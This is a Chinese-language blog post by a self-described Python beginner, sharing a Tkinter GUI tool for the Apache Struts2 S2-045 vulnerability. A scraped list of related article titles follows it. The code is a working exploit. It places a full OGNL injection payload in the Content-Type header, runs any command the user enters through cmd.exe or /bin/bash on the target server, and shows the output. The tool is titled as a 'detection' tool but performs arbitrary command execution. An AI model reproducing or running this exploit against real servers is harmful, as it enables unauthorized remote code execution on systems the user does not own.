初学python脚本,写个工具练练手。第一次写勿喷。呃...忘了截图了,补上了。

程序对于处理 JSON post 有些问题,其他地方还没发现有啥问题。

#coding:utf-8
import chardet
import urllib2
import httplib
from Tkinter import *
from poster.encode import multipart_encode
from poster.streaminghttp import register_openershttplib.HTTPConnection._http_vsn = 500
httplib.HTTPConnection._http_vsn_str = 'HTTP/1.1'class START():def __init__(self,root):self.root=rootself.show_W_Text = Text()self.show_url_ed = Label(root, text="请输入URL,例如:http://www.88.com,一定要有http://,否则报错")self.edit_url = Entry(root, text="输入地址",width = 80)self.show_cmd_ed = Label(root, text="请输入命令,例如:whoami")self.edit_cmd = Entry(root, text="输入命令",width = 80)self.butt_whois = Button(root, text="发送测试",command=self.poc)self.show_url_ed.pack()self.edit_url.pack()self.show_cmd_ed.pack()self.edit_cmd.pack()self.butt_whois.pack()self.show_W_Text.pack()def poc(self):w_url = self.edit_url.get()w_cmd = self.edit_cmd.get()text = self.show_W_Textregister_openers()datagen, header = multipart_encode({"image1":""})header["User-Agent"] = "Chrome/56.0.2924.87"header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+w_cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"request = urllib2.Request(w_url, datagen, headers=header)response = urllib2.urlopen(request).read()char = chardet.detect(response)["encoding"]if char == 'GB2312':response = response.decode("GBK").encode("UTF-8")else:response = response.decode(char).encode("UTF-8")text.insert(1.0, "执行结果为:\n"+response)if __name__ == '__main__':root=Tk()root.title("S2-45漏洞检测")motion=START(root)mainloop()

转载于:https://www.cnblogs.com/MiWhite/p/6535143.html

python S2-45 漏洞利用工具相关推荐

  1. s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...

  2. s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)-阿里云开发者社区...

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...

  3. 部分CIA的漏洞利用工具干货请查收

    3月12日讯 CIA 辛辛苦苦几年攒的漏洞和工具"被"提交事件后,业内人士和记者都在仔细查看这些文件,各方都在关注事情进展. 相关阅读: 维基解密再曝美国情报机构惊天内幕 批露CI ...

  4. 7. Vulnerability exploitation tools (漏洞利用工具 11个)

    Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

  5. ASP.net 资源请求漏洞利用工具PadBuster

    ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...

  6. S2-045漏洞利用工具解决方案

    S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...

  7. WPS漏洞利用工具Bully常见命令集合

    WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.

  8. WebDAV服务漏洞利用工具DAVTest

    WebDAV服务漏洞利用工具DAVTest WebDAV是基于Web服务的扩展服务.它允许用户像操作本地文件一样,操作服务器上的文件.借助该功能,用户很方便的在网络上存储自己的文件.为了方便用户使用, ...

  9. Sundown EK:漏洞利用工具中的抄袭大师

    简介 Sundown是目前市场上最新款的漏洞利用工具,而Sundown的作者也成功地证明了自己其实就是一个抄袭大师.不知道这种"借鸡生蛋"的事情被曝光之后,还有用户会买他的单吗? ...

  10. 不能执行已释放 script 的代码_[漏洞预警]CVE20190708远程桌面代码执行漏洞利用工具已放出...

    漏洞描述 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了许多版本的Windows操作系统.该漏洞在不需身份认证的情况下即可远程触发,危害与影 ...

最新文章

  1. 5分钟搞懂如何使用探针检查Kubernetes健康
  2. SAP SD销售业务中客户投诉退货的处理方案
  3. Outlook收不到邮件, 或者收邮件很慢, 怎么办?
  4. 利用Win32 Debug API打造自己的调试器Debugger
  5. 2.5英寸硬盘何止“五脏俱全”(硬盘构造再揭秘之四)
  6. MyEclipse启动tomcat出现java.lang.OutOfMemoryError: PermGen space 的解决方案
  7. Windows安装 ANT
  8. 纪念品分组java_纪念品分组 ——易懂、简介、技巧(Java代码)
  9. 51单片机外部中断实验 设置中断优先级寄存器,当有外部中断0请求中断时,中断程序执行发光二极管程序,在此过程中,外部中断1也有中断请求,外部中断0的中断程序将被中断去执行外部中断1的中断程序(数码管
  10. php访问多重数组,PHP实现删除多重数组对象属性并重新赋值的方法
  11. 编写可复用的自定义按钮
  12. [USACO08NOV]时间管理Time Management
  13. html中添加3dmax建模,HT for Web自定义3D模型的WebGL应用
  14. python27缺少dll的解决
  15. intel网卡驱动下载linux,intel网卡驱动下载
  16. 使用itext,html转pdf使用报错:java.lang.NoSuchMethodError: com.lowagie.text.pdf.BaseFont.getCharBBox(C)
  17. Android 静默安装
  18. 电脑录像,笔记本电脑录像功能_笔记本电脑 录像
  19. 制作Java视频播放器
  20. 【调剂】上海航天802所2023年研究生调剂开始啦!

热门文章

  1. 使用json把php数据传给js处理
  2. 全栈开发必备的10款 Sublime Text 插件
  3. gnome2 恢复默认 panel
  4. (转)GridView固定表头
  5. Django项目实战之用户头像上传与访问
  6. leetcode 761. Special Binary String
  7. python的包管理
  8. Office 2007 打开故障 The setup controller has encountered a problem during instll
  9. win2003实现单用户远程登录
  10. 利用ComplexHeatmap绘制热图(一)